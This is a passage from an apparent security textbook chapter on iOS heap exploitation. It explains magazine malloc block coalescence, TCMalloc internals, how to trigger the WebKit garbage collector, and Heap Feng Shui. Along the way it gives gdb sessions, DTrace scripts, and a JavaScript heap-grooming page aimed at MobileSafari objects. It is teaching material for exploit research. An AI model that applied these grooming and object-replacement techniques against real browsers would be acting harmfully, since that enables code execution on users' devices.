0x2fdffb1c:   0x0017ce10   0x0017ce40   0x0017ce70   0x0017cea0
0x2fdffb2c:   0x0017ced0   0x0017cf00   0x0017cf30   0x0017cf60
0x2fdffb3c:   0x0017cf90   0x0017cfc0   0x0017cff0   0x0017d020
0x2fdffb4c:   0x0017d050   0x0017d080   0x0017d0b0   0x0017d0e0
0x2fdffb5c:   0x0017d110   0x0017d140   0x0017d170   0x0017d1a0
0x2fdffb6c:   0x0017d1d0   0x0017d200   0x0017d230   0x0017d260
0x2fdffb7c:   0x0017d290   0x0017d2c0   0x0017d2f0   0x0017d320
0x2fdffb8c:   0x0017d350   0x0017d380
(gdb) x/15x 0x0017ca80
0x17ca80:     0xcccccccc   0xcccccccc   0xcccccccc   0xcccccccc
0x17ca90:     0xcccccccc   0xcccccccc   0xcccccccc   0xcccccccc
0x17caa0:     0xcccccccc   0xcccccccc   0xcccccccc   0xcccccccc
0x17cab0:     0xcccccccc   0xcccccccc   0xcccccccc
(gdb) c
Continuing.

All of the 50 objects were allocated, and each one of them is filled with 0xcc, as expected. Going on further you can see the status of the application after 25 objects are freed:

Program received signal SIGINT, Interrupt.
0x0000235a in main (argc=1, argv=0x2fdffbac) at
/Users/snagg/Documents/Book/booktest/booktest/main.m:34
34        DebugBreak();
(gdb) x/15x 0x0017cae0
0x17cae0:     0xa0000000   0xe0017cb4   0xcccc0003   0xcccccccc
0x17caf0:     0xcccccccc   0xcccccccc   0xcccccccc   0xcccccccc
0x17cb00:     0xcccccccc   0xcccccccc   0xcccccccc   0x0003cccc
0x17cb10:     0xcccccccc   0xcccccccc   0xcccccccc
(gdb) c
Continuing.

The fourth object is one of those that were freed; specifically, it is the last one added to the freelist (the last object freed, buggy[1], is stored in the mag_last_free cache instead). Its previous pointer is set to NULL and the next pointer is set to the sixth object in the buggy array. Finally, you allocate the objects you are interested in:

Program received signal SIGINT, Interrupt.
0x000023fe in main (argc=1, argv=0x2fdffbac) at
/Users/snagg/Documents/Book/booktest/booktest/main.m:41
41        DebugBreak();
(gdb) x/10x interesting
0x2fdffaa4:   0x0017ca80   0x0017cae0   0x0017cb40   0x0017cba0
0x2fdffab4:   0x0017cc00   0x0017cc60   0x0017ccc0   0x0017cd20
0x2fdffac4:   0x0017cd80   0x0017cde0
(gdb) x/15x 0x0017ca80
0x17ca80:     0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa
0x17ca90:     0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa
0x17caa0:     0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa
0x17cab0:     0xcccccccc   0xcccccccc   0xcccccccc

All 10 new objects occupy blocks that were previously freed, and their content is filled with 0xaa as expected. The output shows the block at 0x0017ca80 (the second object of buggy), which you saw earlier filled with 0xcc.

In a real-life application, the same technique can be applied, although some difficulties arise. Specifically, the heap state at the beginning of the exploit will be unknown and far from “ideal,” and the attacker might not have enough room to allocate as many objects as she wishes. Nonetheless, often this technique proves to be pretty useful and applicable. Later in this chapter when describing TCMalloc, you learn how to apply it to MobileSafari.

Exploiting Object Lifetime Issues

When dealing with object lifetime issues it is very important to be able to replace the vulnerable object in memory. This can become tricky when memory blocks are coalesced; in fact, in that case, the object size can change in more or less unpredictable ways. In general, you have three ways to overcome this problem:

Replace the object right after the vulnerable one was freed.
Place the object in between allocated objects.
Place the object in between objects whose size you control.

With the first strategy the object will be fetched directly from the mag_last_free cache, and therefore no coalescence can take place. The second case makes sure that the next and the previous objects are not freed, again ensuring coalescence is not possible. The last case allows you to predict the size of the final object that will be coalesced, and thus be able to allocate a proper replacement object. To use the first or the second technique, you can use the examples previously shown in this chapter; you can try out the last technique with this simple application:

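#import <UIKit/UIKit.h>
#import "bookAppDelegate.h"   // app delegate header (file name assumed from the class name)
#include <stdlib.h>           // malloc, free

// Software breakpoint: getpid() (syscall 20), then kill(pid, SIGINT) (syscall 37).
#define DebugBreak() \
do { \
__asm__("mov r0, #20\nmov ip, r0\nsvc 128\nmov r1, #37\nmov ip, r1\nmov r1, #2\nmov r2, #1\nsvc 128\n" \
: : : "memory","ip","r0","r1","r2"); \
} while (0)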

int main(int argc, char *argv[])
{
    unsigned long *ptr1, *ptr2, *ptr3, *ptr4;
    unsigned long *replacement;
   
    ptr1 = malloc(48);
    ptr2 = malloc(64);
    ptr3 = malloc(80);
    ptr4 = malloc(24);
    DebugBreak();
   
    free(ptr1);
    free(ptr2);
    free(ptr3);
    free(ptr4);
    DebugBreak();
   
    replacement = malloc(192);
   
    DebugBreak();
   
   
    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil, NSStringFromClass
([bookAppDelegate class]));
    }
}

The application allocates four objects of different sizes. The goal is to replace ptr2. To do this you must take block coalescence into account: once ptr1, ptr2, and ptr3 are freed and merged, the resulting block is 48 + 64 + 80 = 192 bytes, so the replacement object is 192 bytes instead of 64 bytes. Running the application verifies this:

GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "--host=i386-apple-darwin --target=arm-apple-darwin".
tty /dev/ttys002
target remote-mobile /tmp/.XcodeGDBRemote-1923-41
Switching to remote-macosx protocol
mem 0x1000 0x3fffffff cache
mem 0x40000000 0xffffffff none
mem 0x00000000 0x0fff none
[Switching to process 7171 thread 0x1c03]
[Switching to process 7171 thread 0x1c03]
sharedlibrary apply-load-rules all
Current language:  auto; currently objective-c
(gdb) x/x ptr1
0x170760:    0x00000000
(gdb) c
Continuing.

ptr1 is allocated at 0x170760. Continuing the execution, you examine its content after all the pointers are freed:

Program received signal SIGINT, Interrupt.
0x0000240e in main (argc=1, argv=0x2fdffbac) at
/Users/snagg/Documents/Book/booktest/booktest/main.m:34
34        DebugBreak();
(gdb) x/4x ptr1
0x170760:     0x20000000   0x20000000   0x0000000c   0x00000000
(gdb) c
Continuing.

The free block at ptr1 now records a size of 0x000c quanta, which at 16 bytes per quantum corresponds to 192 bytes. It appears you are on the right track. Finally, the application allocates the replacement object:

Program received signal SIGINT, Interrupt.
0x00002432 in main (argc=1, argv=0x2fdffbac) at
/Users/snagg/Documents/Book/booktest/booktest/main.m:38
38       DebugBreak();
(gdb) x/x replacement
0x170760:   0x20000000
(gdb)

The replacement object is correctly placed where ptr1 used to be in memory. ptr2 has been successfully replaced regardless of block coalescence.
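The arithmetic behind the 192-byte replacement can be checked with a short sketch. It assumes the 16-byte tiny quantum seen in the debugger output and that ptr1, ptr2, and ptr3 are the adjacent blocks that coalesce; the function names are illustrative and not part of any allocator API.

```javascript
// Assumption: tiny-region quantum of 16 bytes (magazine malloc).
const TINY_QUANTUM = 16;

// Number of quanta needed to satisfy a request of `size` bytes.
function quantaFor(size) {
  return Math.ceil(size / TINY_QUANTUM);
}

// Size in bytes of the single free block left after adjacent blocks coalesce.
function coalescedSize(sizes) {
  const quanta = sizes.reduce((total, size) => total + quantaFor(size), 0);
  return quanta * TINY_QUANTUM;
}

// ptr1, ptr2, and ptr3 from the test application.
const freed = [48, 64, 80];
console.log("quanta: 0x" + (coalescedSize(freed) / TINY_QUANTUM).toString(16));
console.log("replacement size: " + coalescedSize(freed));
```

The two values printed match the 0x000c size field and the 192-byte malloc() call in the example above.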

The next section examines a different allocator used by a number of applications, including MobileSafari.

Understanding TCMalloc

TCMalloc is an allocator originally conceived by Sanjay Ghemawat, and it is meant to be as fast as possible in multi-threaded applications. As a matter of fact, the whole structure of the allocator reduces thread interaction and locking to a bare minimum.

TCMalloc is of great interest to us because it is the allocator of choice for WebKit. In this section you delve into it to understand how it works and how you, as an attacker, can leverage it to your needs.

TCMalloc has two different mechanisms for dealing with large and small allocations. The former are managed by the so-called Pageheap and are directly relayed to the underlying OS allocator, which was already discussed, whereas the latter are handled entirely by TCMalloc.

Large Object Allocation and Deallocation

Whenever an allocation for an object that is bigger than a user-defined threshold, kMaxSize, is requested, the page-level allocator is used. The page-level allocator, Pageheap, allocates spans, that is, a set of contiguous pages of memory.

The procedure starts by looking in the doubly linked list of spans already allocated to see whether any of the correct size are available to TCMalloc. The doubly linked list holds two types of spans: ones that are available for use and ones that were deallocated by TCMalloc but have yet to be returned to the underlying system heap.

If a deallocated span is available, it is first reallocated and then returned. If, instead, the span is available and not marked deallocated, it is simply returned. If no spans of the correct size are available, the page-level allocator tries to locate a bigger span that is “good enough” for the role; that is, a span that is as close as possible to the requested size. Once it has found such a span, it splits the span so that the rest of the memory can be used later and returns a span of the correct size.

If no suitable spans are available, a new set of pages is requested from the underlying OS and split into two memory objects: one of the requested size and another one of the allocated size minus the amount of memory needed by the requested allocation.

When a span is not needed anymore, it is first coalesced with either the preceding span, the next span, or both, and then it is marked as free. Finally, the span is returned to the system by the garbage collector depending on a number of user-defined parameters, specifically, once the number of freed spans is greater than targetPageCount.
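The span lookup, split, and coalescing steps described above can be sketched with a toy model. This is not TCMalloc's code: spans are plain {start, pages} records kept in one array, and MIN_SYSTEM_PAGES is a hypothetical growth policy invented for the example.

```javascript
// Toy model of the page-level allocator (not the real Pageheap structures).
const MIN_SYSTEM_PAGES = 8; // hypothetical: minimum pages requested from the OS

function createPageHeap() {
  return { free: [], nextSystemPage: 0 };
}

function allocateSpan(heap, pages) {
  // 1. Prefer a free span of exactly the requested size.
  let index = heap.free.findIndex((s) => s.pages === pages);

  // 2. Otherwise take the smallest free span that is still large enough.
  if (index === -1) {
    heap.free.forEach((s, i) => {
      if (s.pages > pages && (index === -1 || s.pages < heap.free[index].pages)) {
        index = i;
      }
    });
  }

  // 3. Otherwise request fresh pages from the system.
  if (index === -1) {
    const grown = Math.max(pages, MIN_SYSTEM_PAGES);
    heap.free.push({ start: heap.nextSystemPage, pages: grown });
    heap.nextSystemPage += grown;
    index = heap.free.length - 1;
  }

  // Split: hand out the front part, keep the remainder for later requests.
  const span = heap.free.splice(index, 1)[0];
  if (span.pages > pages) {
    heap.free.push({ start: span.start + pages, pages: span.pages - pages });
  }
  return { start: span.start, pages: pages };
}

function freeSpan(heap, span) {
  let merged = { start: span.start, pages: span.pages };
  // Coalesce with the preceding and/or the next free span, if any.
  heap.free = heap.free.filter((s) => {
    if (s.start + s.pages === merged.start) {
      merged = { start: s.start, pages: s.pages + merged.pages };
      return false;
    }
    if (merged.start + merged.pages === s.start) {
      merged = { start: merged.start, pages: merged.pages + s.pages };
      return false;
    }
    return true;
  });
  heap.free.push(merged);
}

const heap = createPageHeap();
const first = allocateSpan(heap, 3);  // no free spans yet: grows, then splits
const second = allocateSpan(heap, 2); // carved out of the remainder
freeSpan(heap, first);
freeSpan(heap, second);               // merges with both neighbours
console.log(first, second, heap.free);
```

The model leaves out the step where free spans are eventually handed back to the system, since that depends on parameters the toy does not have.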

Small Object Allocation

The mechanism used for allocating small objects is pretty convoluted. Each running thread has its own dedicated object cache and freelist. A freelist is a doubly linked list that is divided into allocation classes. The class for objects that are smaller than 1024 bytes is computed as follows: (object_size + 7)/8.

Objects bigger than that are 128-byte aligned, and the class is computed this way: (object_size + 127 + (120<<7))/128.
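The two formulas can be tried out with a small helper. The function name classIndex is made up for this sketch, and integer division is expressed with shifts. Both formulas yield the same value at exactly 1024 bytes, so it makes no difference which side of the boundary that size falls on.

```javascript
// Allocation class as described in the text (integer division).
function classIndex(objectSize) {
  if (objectSize <= 1024) {
    return (objectSize + 7) >> 3;                 // (object_size + 7) / 8
  }
  return (objectSize + 127 + (120 << 7)) >> 7;    // (object_size + 127 + (120<<7)) / 128
}

for (const size of [40, 60, 64, 1024, 1025]) {
  console.log(size + " bytes -> class " + classIndex(size));
}
```

Note that 60-byte and 64-byte requests fall in the same class, which is why a 60-byte string can be used to fill the slot of a 60-byte object.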

In addition to the per-thread cache, a central cache exists. The central cache is shared by all threads and has the same structure as the thread cache.

When a new allocation is requested, the allocator first retrieves the thread cache for the current thread and looks into the thread freelist to verify whether any slots are available for the correct allocation class. If this fails, the allocator looks inside the central cache and retrieves an object from there. For performance reasons, when the thread cache is forced to ask the central cache for available objects, a whole range of objects is transferred into the thread cache instead of just one.

In the scenario where both the thread cache and the central cache have no objects of the correct allocation class, those objects are fetched directly from the spans by following the procedure explained for large objects.
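The lookup order (thread cache, then central cache, then spans) can be illustrated with a toy model. Everything here is a simplification made up for the example: BATCH_SIZE, the address counter, and the log are hypothetical, and the real allocator keeps linked lists rather than arrays.

```javascript
// Toy model of the small-object path: thread cache -> central cache -> spans.
const BATCH_SIZE = 4; // hypothetical number of objects moved per transfer

function createCaches() {
  return { thread: new Map(), central: new Map(), nextAddress: 0x1000, log: [] };
}

// Return the freelist for an allocation class, creating it on first use.
function listFor(cache, cls) {
  if (!cache.has(cls)) cache.set(cls, []);
  return cache.get(cls);
}

function allocateSmall(caches, cls, objectSize) {
  const threadList = listFor(caches.thread, cls);
  if (threadList.length === 0) {
    const centralList = listFor(caches.central, cls);
    if (centralList.length === 0) {
      // Neither cache has objects: carve consecutive objects out of a span.
      for (let i = 0; i < BATCH_SIZE; i++) {
        centralList.push(caches.nextAddress);
        caches.nextAddress += objectSize;
      }
      caches.log.push("span");
    }
    // Move a whole range into the thread cache, not just one object.
    threadList.push(...centralList.splice(0, BATCH_SIZE));
    caches.log.push("central");
  }
  caches.log.push("thread");
  return threadList.shift();
}

const caches = createCaches();
const addresses = [];
for (let i = 0; i < 5; i++) {
  addresses.push(allocateSmall(caches, 8, 64).toString(16));
}
console.log(addresses.join(" "));
console.log(caches.log.join(" "));
```

In this model, back-to-back allocations of one class come out at consecutive addresses, which is the property that heap shaping relies on.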

Small Object Deallocation

When a small object is deallocated, it is returned to the thread cache freelist. If the freelist exceeds a user-defined parameter, a garbage collection occurs.

The garbage collector then returns the unused objects from the thread cache freelist to the central cache freelist. Because all the objects in the central cache come from spans, whenever a new set of objects is reassigned to the central freelist, the allocator verifies whether the span the object belongs to is completely free or not. If it is, the span is marked as deallocated and will eventually be returned to the system, as explained before for large object allocation.
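A minimal sketch of this deallocation path follows. It models a single allocation class backed by a single span; MAX_THREAD_LIST_LENGTH stands in for the user-defined parameter, and both it and the "move everything" policy are assumptions made for the example rather than TCMalloc's real tuning.

```javascript
// Toy model of small-object deallocation for one class and one span.
const MAX_THREAD_LIST_LENGTH = 4; // hypothetical stand-in for the user-defined limit

function createState(objectsPerSpan) {
  return { threadList: [], centralList: [], objectsPerSpan: objectsPerSpan, spanReleased: false };
}

// Garbage collection: hand the thread cache objects back to the central cache.
function collect(state) {
  state.centralList.push(...state.threadList.splice(0));
  // If every object carved from the span is back, the span itself is free.
  if (state.centralList.length === state.objectsPerSpan) {
    state.centralList.length = 0;
    state.spanReleased = true;
  }
}

function freeSmall(state, address) {
  // A freed object always goes to the thread cache freelist first.
  state.threadList.unshift(address);
  if (state.threadList.length > MAX_THREAD_LIST_LENGTH) {
    collect(state);
  }
}

const state = createState(5);
for (let i = 0; i < 5; i++) {
  freeSmall(state, 0x1000 + i * 64);
  console.log("thread=" + state.threadList.length +
              " central=" + state.centralList.length +
              " spanReleased=" + state.spanReleased);
}
```

The model shows why freeing a handful of objects is not enough to move them out of the thread cache: nothing happens until the freelist grows past its limit.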

Taming TCMalloc

This section dissects the techniques used to control the TCMalloc heap layout so that it becomes as predictable as possible. Specifically, it explains what steps are needed to exploit an object lifetime issue and talks about a technique called Heap Feng Shui. The technique was first discussed publicly by Alex Sotirov, who tailored it to exploiting heap overflows in Internet Explorer. Nonetheless, the same concepts can be applied to pretty much every heap implementation available on the market.

Obtaining a Predictable Heap Layout

To obtain a predictable heap layout, the first thing you need to do is find an effective way to trigger the garbage collector. This is particularly important in the case of object lifetime issues because, most of the time, the objects aren't actually freed until a garbage collection occurs. The most obvious way of triggering the garbage collector is to use JavaScript. This, however, means that the techniques used are JavaScript-engine–dependent.

You can find the MobileSafari JavaScript engine, codenamed Nitro, in the JavaScriptCore folder inside the WebKit distribution. Each object allocated through JavaScript is wrapped into a JSCell structure. The TCMalloc garbage collector is heavily influenced by the Nitro behavior. In fact, as long as the JSCells are in use, those memory objects will not be freed.

To better understand this concept, take a look at the deallocation process of an HTML div object inside MobileSafari. You first allocate 10 HTML div objects, then you deallocate them and use a function (in this case Math.acos) to understand from the debugger when the deallocation is supposed to happen. Finally, you allocate a huge number of objects and see when the actual deallocation of the object happens:

Breakpoint 6, 0x9adbc1bb in WebCore::HTMLDivElement::create ()
(gdb) info reg
eax            0x28f0c0     2683072
ecx            0x40  64
edx            0x40  64
ebx            0xc006ba88  -1073300856
esp            0xc006b2a0  0xc006b2a0
ebp            0xc006b2b8  0xc006b2b8
esi            0x9adbc1ae  -1696874066
edi            0xc006ba28  -1073300952
eip            0x9adbc1bb  0x9adbc1bb
<WebCore::HTMLDivElement::create(WebCore::QualifiedName const&,
WebCore::Document*)+27>
eflags         0x282  642
cs             0x1b  27
ss             0x23  35
ds             0x23  35
es             0x23  35
fs             0x0  0
gs             0xf  15
(gdb) awatch *(int *)0x28f0c0
Hardware access (read/write) watchpoint 8: *(int *) 2683072
(gdb) c
Continuing.
Hardware access (read/write) watchpoint 8: *(int *) 2683072

The div object is stored in EAX. You set a memory watchpoint on it to be able to track it during the execution.

Breakpoint 4, 0x971f9ee5 in JSC::mathProtoFuncACos ()
(gdb)

Now you have reached the point where the object is supposed to be deallocated, but the output shows that the object is still allocated as far as TCMalloc is concerned. Continuing further you get the following:

(gdb) continue
Continuing.
Hardware access (read/write) watchpoint 8: *(int *) 2683072

Value = -1391648216
0x9ad7ee0e in WebCore::JSNodeOwner::isReachableFromOpaqueRoots ()
(gdb)
Continuing.
Hardware access (read/write) watchpoint 8: *(int *) 2683072

Value = -1391648216
0x9ad7ee26 in WebCore::JSNodeOwner::isReachableFromOpaqueRoots ()
(gdb)
Continuing.
Hardware access (read/write) watchpoint 8: *(int *) 2683072

Old value = -1391648216
New value = -1391646616
0x9b4f141c in non-virtual thunk to WebCore::HTMLDivElement::~HTMLDivElement() ()
(gdb) bt 20
#0  0x9b4f141c in non-virtual thunk to WebCore::HTMLDivElement::~HTMLDivElement() ()
#1  0x9adf60d2 in WebCore::JSHTMLDivElement::~JSHTMLDivElement ()
#2  0x970c5887 in JSC::MarkedBlock::sweep ()
Previous frame inner to this frame (gdb could not unwind past this frame)
(gdb)

So the object is freed only after the Nitro garbage collector is invoked. It is pretty vital, then, to understand when and how the Nitro garbage collector is triggered.

The Nitro garbage collector is invoked in three scenarios:

After a timeout that is set at compile time
After the JavaScript global data are destroyed (that is, when a thread dies)
When the number of bytes allocated exceeds a certain threshold

Clearly, the easiest way to control the garbage collector is through the third scenario. The process is pretty much the same as the one used to trigger it in the previous example. A number of objects can be used to trigger the behavior of the third scenario, for instance images, arrays, and strings. You see later that in the Pwn2Own case study, strings and arrays are used, but the choice of the object depends on the bug in question.

The next important step is to find objects over which you have as much control as possible, and use those to tame the heap, and, in case of object lifetime issues, replace the faulty object. Usually, strings and arrays fit the purposes fine. What you need to pay particular attention to, most of the time, is the ability to control the first four bytes of the object you are using for replacing the faulty ones, because those four bytes are where the virtual function table pointer is located, and controlling it is usually the easiest way to obtain code execution.
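To make the "first four bytes" point concrete, here is a sketch of how a 32-bit pointer maps onto the first two characters of a JavaScript string. It assumes a little-endian 32-bit target and that the string's character data ends up at offset 0 of the replaced object, which depends on the WebKit version. The address 0x06000000 is a hypothetical location of attacker-controlled data, and the helper names are invented for the example.

```javascript
// Split a 32-bit pointer into the two UTF-16 code units that reproduce
// its four bytes when stored little-endian.
function pointerToCodeUnits(pointer) {
  return [pointer & 0xffff, (pointer >>> 16) & 0xffff];
}

// Bytes as they would appear in memory for a sequence of code units.
function codeUnitsToBytes(units) {
  const bytes = [];
  for (const unit of units) {
    bytes.push(unit & 0xff, unit >>> 8);
  }
  return bytes;
}

const fakeVtable = 0x06000000; // hypothetical address of sprayed data
const units = pointerToCodeUnits(fakeVtable);
const replacementPrefix = String.fromCharCode(...units);

console.log(units.map((u) => "0x" + u.toString(16)));
console.log(codeUnitsToBytes(units));
console.log(replacementPrefix.length);
```

The low half of the pointer goes in the first character and the high half in the second.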

Tools for Debugging Heap Manipulation Code

Debugging heap manipulation code can be tricky, and no default Mac OS X or iPhone tools offer support for TCMalloc heap debugging. Because the implementation of TCMalloc used on the iPhone is the same one used on Mac OS X, you can perform all the debugging needed on Mac OS X using Dtrace. This section doesn't cover the details of Dtrace or the D language, but presents two scripts that ease the debugging process. These scripts will be extremely useful for your exploitation work.

The first script records allocations of all sizes and prints a stack trace:

#pragma D option mangled

BEGIN
{
     printf("let's start with js tracing");
}


pid$target:JavaScriptCore:_ZN3WTF10fastMallocEm:entry
{
     printf("Size %d\n", arg0);
     ustack(4);

}

The second one allows you to trace allocations and deallocations of a specific size:

#pragma D option mangled
BEGIN
{
     printf("let's start with allocation tracing");
}


pid$target:JavaScriptCore:_ZN3WTF10fastMallocEm:entry
{
     self->size = arg0;
}

pid$target:JavaScriptCore:_ZN3WTF10fastMallocEm:return
/self->size == 60/
{
     printf("Pointer 0x%x\n", arg1);
     addresses[arg1] = 1;
     ustack(2);
}

pid$target:JavaScriptCore:_ZN3WTF8fastFreeEPv:entry
/addresses[arg0]/
{
     addresses[arg0] = 0;
     printf("Object freed 0x%x\n", arg0);
     ustack(2);
}

The only thing you need to do to port results from Mac OS X to iOS is determine the correct object sizes, because those sizes might differ between the two platforms. Doing this is relatively easy; in fact, most of the time it is possible to locate the size of the object you are dealing with in the binary. Alternatively, by using BinDiff on the Mac OS X and iOS WebKit binaries, it is often possible to determine the size.

Another invaluable tool when it comes to debugging heap sprays is vmmap. This allows you to see the full content of the process address space. Grepping for JavaScript in the vmmap output shows which regions of memory are allocated by TCMalloc. Knowing common address ranges is useful when you have to do some guesswork on addresses (for instance, when pointing a fake vtable pointer to an attacker-controlled memory location).

In general, it is preferable when developing an exploit for iOS to debug it using the 32-bit version of Safari on Mac OS X instead of the 64-bit one. This way, the number of differences in terms of object sizes and allocator between the two will be significantly lowered.

Exploiting Arithmetic Vulnerabilities with TCMalloc—Heap Feng Shui

Armed with knowledge of the allocator, the ways to trigger the garbage collector, and the objects to use, you can now proceed with shaping the heap.

The plan is pretty straightforward; the first step is to allocate a number of objects to defragment the heap. This is not rocket science, and depending on the state of the heap at the beginning of the execution of the exploit, the number of objects needed may change slightly. Defragmenting the heap is pretty important because this way it is possible to guarantee that the following objects will be allocated consecutively in memory. Once the heap is defragmented, the goal is to create holes in between objects on the heap. To do so, first a bunch of objects are allocated, and then every other object is freed. At this stage, you are all set to allocate the vulnerable object. If the defragmentation worked as expected, the heap will contain the vulnerable object in between two objects of your choice.

The last step is to trigger the bug and obtain code execution.
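The fill, punch holes, and refill sequence can be simulated with a toy heap. It is a deliberately simplified model, not TCMalloc: slots are handed out consecutively and freed slots are reused most recently freed first, which is an assumption of the sketch. All names are hypothetical.

```javascript
// Toy heap: consecutive slots plus a last-in, first-out freelist.
function createToyHeap() {
  return { next: 0, freeList: [], slots: [] };
}

function toyAlloc(heap, tag) {
  const index = heap.freeList.length > 0 ? heap.freeList.pop() : heap.next++;
  heap.slots[index] = tag;
  return index;
}

function toyFree(heap, index) {
  heap.slots[index] = null;
  heap.freeList.push(index);
}

// One character per slot: S = string, V = vulnerable object, _ = hole.
function layout(heap) {
  return heap.slots.map((tag) => tag || "_").join("");
}

const heap = createToyHeap();
const strings = [];
for (let i = 0; i < 8; i++) strings.push(toyAlloc(heap, "S")); // fill consecutively
for (let i = 0; i < strings.length; i += 2) toyFree(heap, strings[i]); // every other one
console.log(layout(heap)); // holes alternate with strings
for (let i = 0; i < 3; i++) toyAlloc(heap, "V"); // vulnerable objects land in holes
console.log(layout(heap));
```

In the final layout every V that landed in an interior hole has an S on each side, which is the arrangement the real exploit tries to obtain.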

The following code snippet illustrates the process that needs to be carried out to obtain the correct heap layout. You can use the Dtrace script shown in the previous section to trace the allocations and verify that the JavaScript code is working properly:

<html>
<body onload="start()">
<script>

var shui = new Array(10000);
var gcForce = new Array(30000); // 30000 should be enough to trigger a garbage collection
var vulnerable = new Array(10);

function allocateObjects()
{
     for(i = 0; i < shui.length; i++)
          shui[i] = String.fromCharCode(0x8181, 0x8181, 0x8181, 0x8181,
 0x8181, 0x8181,
 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181, 0x8181,
 0x8181, 0x8181,
 0x8181, 0x8181, 0x8181);
}

function createHoles()
{
     for(i = 0; i < shui.length; i+=2)
          delete shui[i];
}

function forceGC() {
     for(i = 0; i < gcForce.length; i++)
          gcForce[i] = String.fromCharCode(0x8282, 0x8282, 0x8282,
0x8282, 0x8282, 0x8282,
0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282,
 0x8282, 0x8282,
0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282,
 0x8282, 0x8282,
0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282,
 0x8282, 0x8282,
0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282,
 0x8282, 0x8282,
0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282, 0x8282,
 0x8282, 0x8282,
0x8282, 0x8282, 0x8282);

}

function allocateVulnerable() {
     for(i = 0; i < vulnerable.length; i++)
          vulnerable[i] = document.createElement("div");
}


function start() {
     alert("Attach here");
     allocateObjects();
     createHoles();
     forceGC();
     allocateVulnerable();
}

</script>

</body>
</html>

Before you can fully understand this code, you need to consider some things. First of all, it is vital to understand the size of the vulnerable object; in this case you are dealing with a 60-byte HTML div element. You can use different methods to ascertain the size of the object: either trace it dynamically in a debugger, use another Dtrace script, or statically determine it by looking at the constructor of the object in a disassembler.

When the object size is known, the second thing you need to do is find a way to properly replace the object. Looking into the WebKit source code you can find the following code initializing a string:

PassRefPtr<StringImpl> StringImpl::createUninitialized(
unsigned length, UChar*& data)
{
    if (!length) {
        data = 0;
        return empty();
    }

    // Allocate a single buffer large enough to contain the StringImpl
    // struct as well as the data which it contains. This removes one
    // heap allocation from this call.
    if (length > ((std::numeric_limits<unsigned>::max() - sizeof(StringImpl)) /
sizeof(UChar)))
        CRASH();
    size_t size = sizeof(StringImpl) + length * sizeof(UChar);
    StringImpl* string = static_cast<StringImpl*>(fastMalloc(size));

    data = reinterpret_cast<UChar*>(string + 1);
    return adoptRef(new (string) StringImpl(length));
}

So, it appears that an attacker can easily control the size of the allocation. In the past, strings were even better in that the attacker had total control over the whole content of the buffer. These days, strings turn out to be less useful because no obvious ways exist to control the first four bytes of the buffer. Nonetheless, for the purpose of this chapter you will be using them because they can be sized easily to fit any vulnerable object size that might be needed.

Of particular importance is the way the size of the allocation is calculated:

size_t size = sizeof(StringImpl) + length * sizeof(UChar);

This tells you how many characters you need to put in your JavaScript code. The size of StringImpl is 20 bytes, and a UChar is two bytes long. Therefore, to allocate 60 bytes of data you need 20 characters in the JavaScript string (20 + 20 * 2 = 60).
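The same calculation can be wrapped in a helper so that the string length follows from the target object size. The constants come from the text (a 20-byte StringImpl and 2-byte UChars); the function names are invented for this sketch, and the header size will differ on other builds.

```javascript
const STRINGIMPL_HEADER_SIZE = 20; // sizeof(StringImpl) as given in the text
const UCHAR_SIZE = 2;              // sizeof(UChar)

// Bytes requested from fastMalloc for a string of `length` characters.
function allocationSize(length) {
  return STRINGIMPL_HEADER_SIZE + length * UCHAR_SIZE;
}

// Characters needed so that the allocation is exactly `targetSize` bytes,
// or null when no string length produces that size.
function charsForAllocation(targetSize) {
  const payload = targetSize - STRINGIMPL_HEADER_SIZE;
  if (payload <= 0 || payload % UCHAR_SIZE !== 0) {
    return null;
  }
  return payload / UCHAR_SIZE;
}

// Build a filler string of the right length out of one repeated code unit.
function makeFiller(targetSize, codeUnit) {
  const count = charsForAllocation(targetSize);
  if (count === null) {
    throw new RangeError("no string length yields " + targetSize + " bytes");
  }
  return String.fromCharCode(...new Array(count).fill(codeUnit));
}

console.log(charsForAllocation(60));          // characters for a 60-byte object
console.log(makeFiller(60, 0x8181).length);   // same value, as a real string
console.log(allocationSize(64));              // size of the 64-character strings
```

The last line shows that the 64-character strings used to force the garbage collection are allocated with a different size than the 60-byte target.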

At this point you are all set to verify that the code is working properly, that is, the HTML div elements are allocated between strings.

Running this code in the browser and tracing the output with the Dtrace script provided earlier shows the following output:

snaggs-MacBook-Air:~ snagg$ sudo dtrace -s Documents/Trainings/Mac hacking training/Materials/solutions_day2/9_WebKit/traceReplace.d -p 1498 -o out2
dtrace: script 'Documents/Trainings/Mac hacking training/Materials/solutions_day2/9_WebKit/traceReplace.d' matched 6 probes
dtrace: 2304 dynamic variable drops
dtrace: error on enabled probe ID 6 (ID 28816: pid1498:JavaScriptCore:_ZN3WTF8fastFreeEPv:entry): invalid address (0x3) in action #3
^Csnaggs-MacBook-Air:~ snagg$
snaggs-MacBook-Air:~ snagg$ cat out2 | grep HTMLDiv
              WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
              WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
              WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
              WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
              WebCore`_ZN7WebCore14HTMLDivElement6createERKNS_13QualifiedNameEPNS_8DocumentE+0x1b
